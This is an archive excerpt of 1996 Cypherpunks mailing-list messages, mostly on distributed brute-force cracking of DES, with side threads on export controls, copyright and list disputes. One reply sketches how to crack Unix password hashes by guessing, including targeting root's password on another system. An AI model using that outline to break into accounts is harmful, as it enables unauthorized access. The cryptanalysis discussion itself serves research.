>| (If that....)
>| Prizes have their place, but are hard to set up properly.

All right, $100 to the winner, by the end of 1996,
for a reasonably-convincingly-non-rigged public crack of DES,
whether it's from a net-run or screen-saver effort,
a DES cracker using fancy special equipment, supercomputers,
microcomputers, DES chips, or Gate Array chips.
$100 extra bonus if the winner is from the NSA or FBI 
(Black-bag jobs, rubber-hose cryptanalysis, and subpoenas
all count as rigged - sorry :-)

At 08:46 AM 7/23/96 -0500, Adam Shostack <adam@homeport.org> wrote:
>	A better way to set up a prize is to find a few big companies
>willing to sponsor such a demonstration.  AT&T, Nortel, RSA, Netscape,
>Microsoft, Qualcomm, and many other companies have an interest in
>seeing stronger than DES crypto exportable.  Perhaps one of them could
>set up a prize, similar to netscape's Bugs Bounty, or the RSA-129
>challenge.

Perhaps cracking 56-bit DES would count as a new bug for Netscape's
existing Bugs Bounty?  

                                  Bill Stewart


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMfWVOPthU5e7emAFAQG99QIAlKIBWs8ynr00uincnNBCymdz2E8CrlL3
MhCndNxOgpFIkjvJSdHNT+4alt2hsgU3fMlK8xWOK56R8WxdkTZvMw==
=GesG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 16:12:03 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Decrypt Unix Password File
Message-ID: <199607240324.UAA08871@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 PM 7/23/96 +0800, Jerome wrote:
>How can I decrypt Unix password file?

Get the source for a a Unix-compatible password encryptor,
reverse it to make it a decryption program,
take the line for a user from the password file, 
decode it from printable-ASCII format to the binary value, 
and enter the user's password.  If you've written your programs
correctly, you'll get the original secret value*.
If this secret value is less than exciting to you (:-),
try lots of things that might be the user's password,
and one of them will work.

Exercises for the reader:
0) What's a "shadow password file"?  Does it affect the methods
described above?

1) Since you know the secret value, you could try using
your existing Unix password software and seeing if you get
the correct encrypted value when you put in the correct password.
1A) Does this suggest some more useable algorithms?
1B) What does the Unix manual page for crypt(3) say about it?
1C) Can you implement a program that does this successfully?
1D) How many tries do you think it will take?
1E) Does anybody on your system use wimpy passwords?

2) Are there any books or papers describing how the Unix Password System
works that would help you understand?
2A) Where would you look for them?
2B) Are they on the Web?  How would you find out?
2C) Which of the following famous authors of Unix wrote
important papers about the topic: Dennis Ritchie?  Ken Thompson?
Brian Kernighan? Rob Pike?  Fred Grampp?  Bob Morris Sr.?  Jr.?
The Brahms Gang?  Bill Joy?  Matt Crawford?  How would you find out?
Did they write anything else interesting?

3) Has anyone else implemented any Unix password cracking programs?
What countries with very cold weather would have them on popular
ftp sites?  Are they more effective than your implementation in 1C)?  Why?

4) If you're trying to crack passwords on a System V Unix system,
why should you always try to crack root's password?

[* hex 0000000000000000, I think. ]

In a later message, Jerome Tan also wrote:
> What is the code of password file of Unix? I have them but don't 
> know how read them. Any file converter or viewer for that?
A) The code is "RTFM"
B) The code is "Ask the user"






#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 20:14:10 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Bare fibers
Message-ID: <199607240324.UAA08876@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


h > > Doesn't that make it vulnerable (detectable) to Tempest attacks?
h > > Harka
rw> No.
rw> Transmitting light via fiber doesn't emit EM.
Light is electromagnetic :-)

rw> Anyway, the original post, as I recall, was about keeping sensitive data 
rw> on a second hard drive, connected via (very thin, therefore harder to 
rw> notice) fiber. Tempest monitoring was not a factor.
rw> -r.w.

I assume that if you've got a fiber hanging from your PC,
and thugs come in to steal/confiscate/forfeitize your PC,
that they're bright enough to notice it and maybe to follow it.
Thugs who want your information will follow it to find information;
thugs who just want to resell your hardware will follow it to
find more hardware.

I had initially assumed that the mention of fiber optics was in the
context of "Infrared transmitter on the PC, fiber optic sticking out
of the wall to receive the IR and transmit it to a hidden detector."
or something silly like that.  If you want to hide a small PC in your
attic/wall/etc and use the newer faster IR stuff for clandestine backups,
and have a Real Operating System so you can run it in the background
(since your disk drive is presumably much faster than IR),
I suppose you could do that.

The main use of TEMPEST here is to detect backup systems hidden in 
the attic that they hadn't noticed.  Hiding it in your stereo
system doesn't protect it from honest thieves, who might also
want to resell your stereo, and info thieves have been known to
seize anything even resembling computer equipment, such as Mozart CDs.
You could also hide the computer in your kitchen cabinets like one 
Famous Cypherpunk, but you'd have to use a thinner bundle of cables 
than he does to connect the monitors and keyboards :-)


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 24 Jul 1996 12:24:50 +0800
To: cypherpunks@toad.com
Subject: Cracking DES or building a DES cracking machine?
Message-ID: <199607240124.UAA12269@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hm,

If we are talking about convincing 100,000 people to donate a lot 
of their CPU time, would not it be possible to convince the same
100,000 people to donate $10 each and build a $1,000,000 DES cracking
machine?

Then we can crack DES keys for a certain sum per key, without asking
any unnecessary questions. Profits can be donated to purchasing AK-47's
for poor preschool children or some similar charitable project.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 24 Jul 1996 14:44:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: DES-busting Javanese pagers and TVs
Message-ID: <199607240039.UAA27954@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Jul 96 at 15:53, Timothy C. May wrote:
[..]
> A while back I proposed one approach: a brute force "screen saver" for
> Windows machines. Other platforms, maybe, but the most cost-effective thing
> to do is to go after the Windows market only.

How about applets for java-aware pagers or tv-sets that will supposedly
show up in the near future?  When a crack is found, you can call a toll-free
number, give them the code, and win a prize (ala Chinese-lottery).

Would it be better to have them all try random keys rather than use 
assigned keyspaces?  Can't keysearches be shorted by half (not that 
it's that significant, 2^55 rather than 2^56) using complement  keys?

First thing one should check are the weak and semi-weak keys (a good 
implementation will avoid them, but that doesn't mean one shouldn't 
check for them).

[..]
> Acquiring chunks of keyspace remains an issue, but I think we resolved a
> while back that a probabalistic method works OK: people just pick chunks at
> random, and the decreased efficiency as compared to perfect scheduling is
> something like a factor of a couple (I have the numbers I calculated
> somewhere, and I recall Hal Finney made the same estimate).
> 
> Some means of communicating results--especially wins!--is still needed.
> This is where Perry's idea of a Java program is a good one.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Wed, 24 Jul 1996 18:46:34 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: DES brute force? (was: Re: Borders *are* transparent)
Message-ID: <199607240410.VAA04257@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


>What DES modes are used in typical banking situations?  (I am
>presuming a challenge involving a widely used banking funds transfer
>protocol would be a suitably juicy targets, based on a criteria of
>demonstrating the greatest financial risk).

The problem with banking applications is that cracking a real key
causes lots of real damage.  I don't think it is illegal (as long
as you don't withdraw somebody else's money), but publishing e.g.
one of the DES keys used for the "EC Card" PIN verification would
bring the European ATM system close to collapse.  Finding a self-
generated key, on the other hand, is not very impressive.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 24 Jul 1996 19:19:02 +0800
To: cypherpunks@toad.com
Subject: Re: Another fascist
Message-ID: <199607240421.VAA10317@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:26 PM 7/22/96 -0700, David Sternlight <david@sternlight.com> wrote:
>One of the great friends of free speech on this list sent a forged cancel
>message to the listbot to try to cancel my subscription.
>The listbot, being reasonably well designed, ignored him and told me about
>it, though I have no doubt less of a dunce could bring it off.
>What a piece of slime!  What do others think of this practice?

Yeah, it's slimy.  If somebody wanted to be rude to you personally,
they could have sent you flames telling you to go away; 
if they wanted to be rude to you publicly, they could have imitated 
many others (:-), and if they simply wanted you to not exist they 
could have installed procmail or used a killfile-capable mailer like
Pegasus or Commercial Eudora and defined you out of existence.  

If the listbot sends you their name, you could always, umm,
escrow them or something.....

(In a killfile, no one can hear you flame...)


(I have tried to remove people from the list, if they've
sent it mail asking to "Unsuscrive" or whatever, but at least
for the last long while that's failed; you at least need a 
half-way attempt at forgery.)



#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Wed, 24 Jul 1996 14:19:58 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607240213.WAA01656@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


david@sternlight.com wrote:

>At 5:09 PM -0700 7/22/96, Ted Anderson wrote:
>>shamrock@netcom.com (Lucky Green) writes:
>>> At 15:27 7/20/96, Tom Weinstein wrote:
>>> >Why not consider what the consequences will be?  Do you seriously
>>> >believe that this will make the government stop enforcing ITAR?  Do you
>>> >believe it will make them change the law?  No.  What it will do is make
>>> >them remove our permission to distribute this stuff.
>>>
>>> I doubt that. PGP has been distributed for years with less safeguards
>>> than Netscape. It is available on more free-world sites than Netscape
>>> US. This did not prompt the powers that be to force MIT to take down
>>> their site.
>>> ...
>>
>>I must agree with Lucky.  I am quite sure that even if Netscape was not
>>begin distributed over the net, copies would still be uploaded to
>>international sites by folks practicing Civil disobedience.
>
>To call simple lawbreaking by cowards working in secret "civil
>disobedience" is to defame the name of Gandhi, King, and all the legitimate
>protesters of modern history. Civil disobedience must be seen publicly, and
>must be done by observable individuals. Masked men throwing stink bombs is
>not civil disobedience--it's hooliganism.

As I have said before, European & other foreign users, who get the strong-
crypto version should pay Netscape what they owe Netscape, to keep the ITAR
as the issue, and not piracy. These are two separate issues, and if necessary
the foreign users can mail anonymous cash [the paper kind] to assuage their
consciences. Not all will do this, of course, but that's another example of
ITAR losing US companies $ again. Lucky is, as usual right. There is a double
standard for PGPdistribution vs other strong crypto distribution, and Tim is
also right that this GAK-loving info-disclosure requirement sets a *really*
lousy precedent for later software distributions. Pelease deal with issues
separately.
me








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Jul 1996 16:02:05 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <199607240531.WAA21163@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:08 PM 7/23/96 -0400, Alan Horowitz wrote:
>> However, what is somewhat less 
>> well-known is the fact that in order to keep higher frequencies from being 
>> "aliased" (reflected to lower frequencies by heterodyne processes) it is 
>> necessary to remove (by filtering) any frequency content above that maximum, 
>> before sampling is done.
>
>   Well, fudge sticks. That sounds like this thing called an "image" in 
>heterodyne analog RF receivers. I know how those work.

Sampling produces essentially the same effect.

>What is the physical basis for "aliasing" as you describe, in the 
>sampling theater of operations?

Sampling a signal of frequency f1 at a rate of f2 produces two mixes, f1+f2 
and f1-f2.  The sum is sufficiently high that it isn't a concern, the 
difference could be.  If you have an input containing frequencies up to 25 
Khz, and you sample it at a rate of 40 kilosamples per second, the input 
frequency of 25 kilohertz gets mirrored down to 15 kilohertz, which is far 
lower than its original frequency.  This is a problem!  

Some of the early voice-scramblers used this effect, heterodyning the audio 
band with a higher-frequency signal and reversing it, changing higher 
frequencies to lower and vice versa.  Not particularly "secure" by today's 
standards, but it probably kept a few people from understanding what's going 
on.  I've heard, however, that with practice you could learn to understand 
such frequency-inverted speech, as odd as it sounds.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 24 Jul 1996 14:27:00 +0800
To: cypherpunks@toad.com
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <ae1a5e6f1d021004c7bc@[205.199.118.202]>
Message-ID: <Pine.LNX.3.94.960723223340.330A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Jul 1996, Timothy C. May wrote:

> BTW, sitting in my hot tub last night I quickly reconstructed the math for
> the "random" keyspace inefficiency:
> 
> -- Imagine that N users are "randomly" picking chunks of keyspace to
> search. That is, they are not coordinating with others to avoid
> duplication.
> 
> -- By the time the total amount of computons expended has equalled the
> amount that would have been expended in a "no duplications" allocated
> search, the Poisson probability distribution says that 1/e = 36.8% of the
> keyspace will not have been searched; the rest of the probabilty lies in
> keyspace searched once, twice, three times, etc.
> 
> -- Thus, the calculation will have to go 2-4 times longer to give a high
> (>95%) chance that the answer is found. For example, at 3 times the
> "efficient" search time, there is only a 1/e^3 = 5% chance that nobody has
> found the answer
> 
> The probabalistic assignment is less efficient, obviously, but has the
> advantage of not requiring a registry of keyspace allocations. Further,
> "denial of service" attacks (lying about having searched a chunk, or
> incorrectly searching or reporting) are not a problem.

Interesting.  I think the most efficient way to search the keyspace would be
combine both methods of distributed cracking.  Each person would choose a
chunk of keyspace and brute-force all the keys within that space.  Then, the
user would send a PGP-signed message to some centralized database that says
what keyspace was brute-forced.  The UserID and fingerprint of each user would
be made available along with the keyspace each user claims to have searched.
This way, reputations could be used to establish which keyspaces should be
double-checked and which ones shouldn't.  This would allow for more "weighted"
probabalistic assignment.  The number of computons that would be used to crack
the keyspace would be somewhere in between centralized and probabalistic
assignment.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfWN6rZc+sv5siulAQHTfgQAkiopcwtuufvNOnit7peOj4PS33M+T68W
VQcaeW2drqlTHXBlfLEn3uAw4syWA/XkPUQhA1l46KiCnPzXa2xIFub+Uk/dRVDO
j5YRvRmrJ2Ly+BZQOvHug3pMtCtoY3QhJKIWSqGFoZj6SYL8Bgc0STBmzeKdC77O
sdyDZvh5Znk=
=Kx49
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Wed, 24 Jul 1996 13:22:36 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Re: Distributed DES crack
In-Reply-To: <199607231430.KAA14775@crypto.com>
Message-ID: <rogerg26ipah8.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Matt Blaze <mab@crypto.com> writes:

  > [FPGA-based machine that can do a single DES key every four months]
  > ...  I expect to build such a prototype
  > machine myself, and, if it works as I expect, maybe the whole
  > thing.

Matt, I don't know exactly what resources you've got at your disposal
these days, but we'd be interested in volunteering some time and
effort on this.  We can help out with things like interface design,
device simulation, board layout, fab, and assembly.  (Unless you want
to make the whole thing a one-man thesis project, of course ;-)

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 24 Jul 1996 17:34:10 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <199607240213.WAA01656@black-ice.gateway.com>
Message-ID: <v03007800ae1b6fcc7d17@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 PM -0700 7/23/96, Anonymous Remail Service wrote:
>As I have said before, European & other foreign users, who get the strong-
>crypto version should pay Netscape what they owe Netscape, to keep the ITAR
>as the issue, and not piracy. These are two separate issues, and if necessary
>the foreign users can mail anonymous cash [the paper kind] to assuage their
>consciences. Not all will do this, of course, but that's another example of
>ITAR losing US companies $ again. Lucky is, as usual right. There is a double
>standard for PGPdistribution vs other strong crypto distribution, and Tim is
>also right that this GAK-loving info-disclosure requirement sets a *really*
>lousy precedent for later software distributions. Pelease deal with issues
>separately.


This is hilarious. About two or three years ago, when I first began
discussing crypto, I made a similar suggestion with respect to RSA.

I was excoriated, pilloried, and in general called a very educational
selection of bad names.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 24 Jul 1996 18:03:43 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: Ross Anderson's Eternity service
In-Reply-To: <Pine.LNX.3.93.960723130327.1031A-100000@smoke.suba.com>
Message-ID: <960723.232310.4a7.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, snow@smoke.suba.com writes:

>
> On Mon, 22 Jul 1996, Hal wrote:
>> A few questions for discussion:
>>  - Would there be much interest in it among users?
>
>      I would be.

Me, too.  I think it's a frighteningly good idea.

>>  - Would it be a net benefit to society for such a service to exist?
>
>      It would benefit people. It may harm society by doing so.

It may harm some particular instantiations of "society", but I think
there's a net benefit.  Remember that evolution always takes more than
one generation.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfWl2hvikii9febJAQFm0QP+JmIGuzCGCpqbdTIfViL9G9Jry7Ryh6pr
5d80uiyTiHbKCYvp+hSoVnnet4TDHhjUSu3eXbAlcl8Id1hci7i1aVOIdIi0rxZ8
SFwNDhrhaUL9940SZiaeUQjlTCYX17Ve0ipn7C15OFiR94I7dwJ5uCjrVyqXyRcs
9OEaSACUj+k=
=htdw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian A. LaMacchia" <bal@freeside.cs.colorado.edu>
Date: Wed, 24 Jul 1996 16:22:50 +0800
To: alexf@iss.net
Subject: Re: Digital Watermarks (long, getting off-topic)
In-Reply-To: <199607231818.OAA07217@phoenix.iss.net>
Message-ID: <199607240547.XAA27144@freeside.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Alex F" <alexf@iss.net>
   Organization: Internet Security Systems, Inc.
   Date: Tue, 23 Jul 1996 14:19:08 +0000
   Precedence: bulk

   > - The entertainment industry has a reputation of being paranoid

   The forgers of the copyright laws (at least as they relate to music) 
   had incredible foresight.  Basically, from the laws that were 
   originally drafted (30's maybe?  Then revised in the early '70's at 
   least as far as public domain goes) both videos and CDs are 
   protected.  These were written when there were no CDs or videos.

Uh, this isn't true.  The Copyright Act of 1909, the immediate
predecessor to the Copyright Act of 1976/1978 (*), did not explicitly
cover sound recordings.  *Sheet music* was protected by copyright, but
it was an open question whether sound recordings were protected.  In
fact, the recording industry was sufficiently unsure of the outcome of a
copyright challenge that they never let the issue go to court.  It
wasn't until the '76 Act that sound recordings were explicitly added to
the set of copyrightable works of authorship.  As for video and other
digital media, it also wasn't until the '76 Act that the "perceivable to
the naked eye" test was modified to allow aid via machine.

The '76 Act was a complete rewrite of copyright law; it did a lot more
than change things with respect to "public domain," although writing
into law the "fair use" test developed by the courts since the '09 Act
was certainly part of it.

					--bal

(*) It's call the Copyright Act of "1976" because (IIRC) it passed
Congress in '76.  But it didn't go into effect until Jan. 1, 1978.
Copyright law did not change between the '09 and '76 Acts.  (Work on the
'76 Act actually began in the 50s; it took Congress over 20 years to
figure out what it wanted to do.  Contrast that with today, where we've
had more changes in copyright law since 1976 than in the prior 200 years.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 24 Jul 1996 16:33:27 +0800
To: nobody@vegas.gateway.com (Anonymous Remail Service)
Subject: Re: Netscape
In-Reply-To: <199607240213.WAA01656@black-ice.gateway.com>
Message-ID: <199607240451.XAA14580@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Anonymous Remail Service wrote:
> david@sternlight.com wrote:
> >To call simple lawbreaking by cowards working in secret "civil
... snip ...

> As I have said before, 
... snip ...
> me
> 

Ha, ha, ha! A typical cypherpunk: takes the pledge not to followup to 
St*rnl*ght, and then follows up anonymously.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 24 Jul 1996 09:15:41 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: NOISE NOISE NOISE: Ayn Rand's sexual pecadillos and the value of her ideas
In-Reply-To: <Pine.SV4.3.91.960723122028.8943E-100000@larry.infi.net>
Message-ID: <199607232156.XAA06781@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself something like Alan Horowitz <alanh@infi.net>
 might have been overheard muttering something along the lines of:
>
> Did Ayn Rand have any good sexual peccedillos?


Some of her female characters like to have rape fantasies 
enacted on the very border of consent.  She had an affair with 
her chief student with the knowledge and presumably consent of 
both of their respective spouses.  She thought that a woman who
wanted to be President of the U.S. and rule over men would 
become a sexless, embittered spinster because she couldn't 
enjoy being dominated.  :-)


I would call those "good ones", but YMMV.  :-)


This is making me feel kind of sleazy.  For what it is worth 
I think that Rand has some of the best ideas in philosophy, and
furthermore presented them in a (more or less) integrated system
which has profoundly useful applications to both theoretical
philosophy and everyday life, not to mention dramatically 
publicizing and popularizing philosophical ideas in a social and
political context.


Rand's ideas are wildly under-rated by most serious thinkers and
wildly over-rated by most of her followers.  It is a shame that 
her acid polemics, kooky tangents, and personality cult have
distracted most people from her valuable insights.


Which brings us back to the original subject of this thread,
although nowhere close to the original topic of this forum.


Regards,

Bryce

#include <stddisclaimer.h> /* speaking for myself, not for
Digicash at this time. */




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMfVKjEjbHy8sKZitAQHZ0AL/dk3UCs/SBX7LEtaH1oInnXtZoswKm9J7
RxXx80HMw95Ym1ihjRoNJqwp1uxieuN+1p9JQpzyxc6/WJWzPF8SmE/vkith7eiL
JSLY9CR0O3J1sTCzJaSlGk9Yfs39EzAG
=V+jp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 24 Jul 1996 15:39:48 +0800
To: cypherpunks@toad.com
Subject: Re: Cracking DES or building a DES cracking machine?
In-Reply-To: <199607240124.UAA12269@manifold.algebra.com>
Message-ID: <2PyJRD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> If we are talking about convincing 100,000 people to donate a lot
> of their CPU time, would not it be possible to convince the same
> 100,000 people to donate $10 each and build a $1,000,000 DES cracking
> machine?

Or enough magnetic tape or CD-R to pre-compute a lookup table,
accessible via the Internet? Hmm, taking one byte and running it
through 2^40 keys will produce exactly 1024GB values. Mag tape
is dollars / megabyte: it seems possible to take a known clear
text (like "cypherpunks") and compute a lookup table that would
take a look at the encryption and list the key(s) that match.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Wed, 24 Jul 1996 20:12:58 +0800
To: cypherpunks@toad.com
Subject: Re: A Snake-Oil FAQ
Message-ID: <199607240509.AAA24465@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Jul 24 00:10:54 1996
> Honestly, this boycott campaign looks out of place on Cypherpunks, at
> least to me. I mean, we are for freedom of speech, aren't we?
> Sternlight is talking about on-topic things. How come that renowned
> defenders of freedom of speech resorted to name calling and attempts to
> push their opponent out of the public forum?
> 

(cheer) I don't agree with David Sternlight; frankly, I doubt
very many of us agree with David Sternlight.  But if we're going
to start plonking just on the basis of a periodic rant, after
he goes Perry goes, and Tim goes, and before long there's no list.

Now to keep things interesting, somebody wanna subscribe
Dorothy Denning to the list? Might be fun :)

dave
- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
"I'm only a social smoker, just a few packs a day really"
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMfWwaTVTwUKWHSsJAQHmAwf/XkwZZtAbymiSni4L8N6D6qW75W2B/Hgv
yuPX0uCoXnBmvUXzq6RS7zNN0A1vtgXhCgzgyYY+1/1PRAAoQAd8q7evX1K+rTVe
1MmlOfJWFHJG9q0tHc45LONagW1m0eAp9Z9fkO4NRhGpybfWDCZKwtClbaLiAdoA
86lJnNRacjEHf1dAAHc/1dibJz+6617nfgLkea0OVbLICIsSpkc3PJLkFE9jjK2a
g+5CXJ8oXg4bKlEw7QoefagXYsM9o6PF+MHIDVT/pZnfoVmGoI9+3BYHkByXh/vQ
8M+w6hZu4X50zzxCx/6lDvzfd1zccmHvJAsx6GXf4VGUp6lIw+lfCg==
=KXCp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Date: Wed, 24 Jul 1996 19:02:15 +0800
To: cypherpunks@toad.com
Subject: A Global Village; an open letter to Bill & Hill and also Mr. & Mrs. Dole, from Asim at Molecule One. Cypherpunks, please excuse this note.
Message-ID: <m0uiyh2-0009maC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


Honourable wishes,

 I write about Mrs. Clinton's concept of Global Village and wholeheartedly,
pledge my support to such an important concept.
 
 The world is everchanging and Mrs. Clinton is correct in that the
industrialized
countries have lost, most, of their extended families. This makes children
vulnerable to danger. If in need of help, such children are commonly abused
due to their vulnerability.

 I want to take this moment to express some understandings. Firstly, it
was never in my plan to locate where I have been over the last while.
Probably, if it hadn't been for many malicious encounters, I probably
would of gone to a remote island, as I hold so dear to my heart. A
close friend was severly violated and I had to witness a war being
fought against civillians. When an insurance policy becomes more
valuable than the human life, something must be wrong with social
ethics.

 To live through many of the experiences I had to, while living here,
made me realize high technology is dangerous in many peoples
lives. To manipulate peoples decisions using brute force seemed
terribly wrong to me. Many of the people controlling the situations
are also stressed out. Abuse results from stress.

  Concerning the old man. I knew of this man since childhood. I
always considered him one of the greatest neuroscientists
on the planet earth. Even his friends hold him with  a greatest
respect. What he accomplished, very few could  match his
accomplishments.

  I send much thanks to Point Communications for allowing me
a long interview about my social concerns. I wanted to personally
thank all the K12 students that partook in my interview. I was
never able to attend the requests of some of those students,
that asked me to review some of their essays, as my time
was occupied with endless other obstacles. I want those
students to understand that I just couldn't.

  I want to thank all those cool students that let me participate
at their, private, dance parties. They know I attended endless
dance parties, researching technological requirements,
so they are happy and socially satisfied. I also got to
know what kind of social threats they are faced with, both,
underground and official. Stress does tend to corrupt some 
people.

  I want you to understand that I came up with Molecule One
as a means to address the needs of a culture. Even though
many plots were directed at me for proposing this project,
I always knew I spoke the truth and my intentions were
pure. Neurosciences has always been a lifelong inspiration
to me. Standards, to improve the quality of life in society,
seemed a noble goal.

 I want the students to know that Molecule One was 
created for their benefit first. They are the future. When
a child remains innocent, that innocence should be
protected. Far too often, children loose their innocence
to hardend people, who's primary motive is malicious
intent. Naivete and innocence is purity and lack of
ethical standard is rampent.

 I knew that acceptance of truth is difficult for
some people, especially those ignorant and those
conditioned to believe otherwise. I always chose
positive as an outcome for motive.

 I want to thank all of you, Republican, Democrat,
and families, friends and which other political
inspiration. I respect all life and those standards that
can increase the health standard of all people. There
are many important factors that must be considered
to insure a safe and healthy society, of the
future. To work together, to attain this standard,
is important for all people, irregardless of color.
Care and courtesy, toward our fellow people,
is another  social characteristic that is becoming
lost, with the loss of the extended family.

 I also want to thank all those cool computer folk
that let me play upon the info  highway, as it was
being developed. I want to thank all those
cyberfolk that recognised the import of all
topics covered. Understand well, visions of
tropical islands have floated through my mind,
probably, everyday I've been here. It  was
my concern for the youth and for the elderly
that made me stay and attempt to create
a project that could bring happiness and
harmony, to the society, for a long time to
come. It is a challenge.

  Thanks for the cyber inspiration, acknowledgement
and being allowed the opportunity to create a 
work of art that can benefit so many.

  To the 1'st family & 2  Mr.& Mrs. Dole, all friends and families.

  Peace and best wishes,
                          Sincerely,

                                  Asim
molecul1@molecule1.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 24 Jul 1996 19:33:37 +0800
